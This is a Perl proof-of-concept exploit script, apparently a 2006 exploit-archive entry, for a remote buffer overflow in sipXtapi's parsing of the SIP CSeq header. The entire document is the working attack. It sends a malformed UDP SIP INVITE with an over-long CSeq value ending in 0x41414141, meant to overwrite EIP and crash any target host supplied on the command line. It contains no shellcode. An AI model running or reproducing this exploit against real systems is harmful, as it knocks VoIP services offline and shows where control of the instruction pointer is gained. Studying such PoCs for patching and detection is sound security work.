
# Title : SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC
# Published : 2006-07-10
# Author : Michael Thumann


#!/usr/bin/perl
# PoC Exploit By mthumann@ernw.de
# Remote buffer overflow in sipXtapi's handling of the SIP CSeq header.
# Crash-only PoC: the overflowing value ends in 0x41414141 ("AAAA"), no payload.

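use IO::Socket;
use strict;
use warnings;

# Crash-only PoC: sends one malformed SIP INVITE over UDP whose CSeq header
# carries an over-long numeric value ending in four 'A' bytes (0x41414141).
# There is no shellcode; a vulnerable sipXtapi build simply crashes.
# Only run this against hosts you are authorised to test.
print "sipXtapi Exploit by Michael Thumann \n\n";

# The single argument is the target host (name or IPv4 address).
if (not $ARGV[0]) {
    print "Usage: sipx.pl <host>\n";
    exit;
}

my $target      = $ARGV[0];
my $source      = "127.0.0.1";         # host advertised in the Request-URI / Contact
my $target_port = 5060;                # standard SIP port
my $eip         = "\x41\x41\x41\x41";  # "AAAA": the bytes that land in EIP on a vulnerable build

# 24 ASCII decimal digits ("115792089237316195423570") followed by $eip:
# a CSeq number far longer than whatever the vulnerable parser copies it into.
my $cseq =
    "\x31\x31\x35\x37\x39\x32\x30\x38" .
    "\x39\x32\x33\x37\x33\x31\x36\x31" .
    "\x39\x35\x34\x32\x33\x35\x37\x30" .
    $eip;

# Each header line ends in "\r" plus the heredoc newline, giving the CRLF
# line endings SIP requires; the lone "\r" line terminates the header block.
# The "@" in the Request-URI is escaped: unescaped, Perl interpolates
# "@$source" as an array dereference and the host part silently vanishes
# (and dies under strict refs).
# Note the Via/From headers name the *target* itself, not this host.
my $packet = <<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";

# Plain UDP datagram to the SIP port.  Name resolution and socket creation
# are checked (the original ignored a failed socket()); a short send is
# treated as an error because a truncated payload would not trigger the bug.
my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerAddr => $target,
    PeerPort => $target_port,
) or die "cannot create UDP socket to $target : $target_port : $@\n";

my $sent = $sock->send($packet);
defined $sent and $sent == length($packet)
    or die "cannot send to $target : $target_port : $!\n";
$sock->close;

# UDP is unacknowledged: "Done." only means the datagram left this host.
# Confirm the result by observing the target (crash/core dump), not this line.
print "Done.\n";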

#EoF
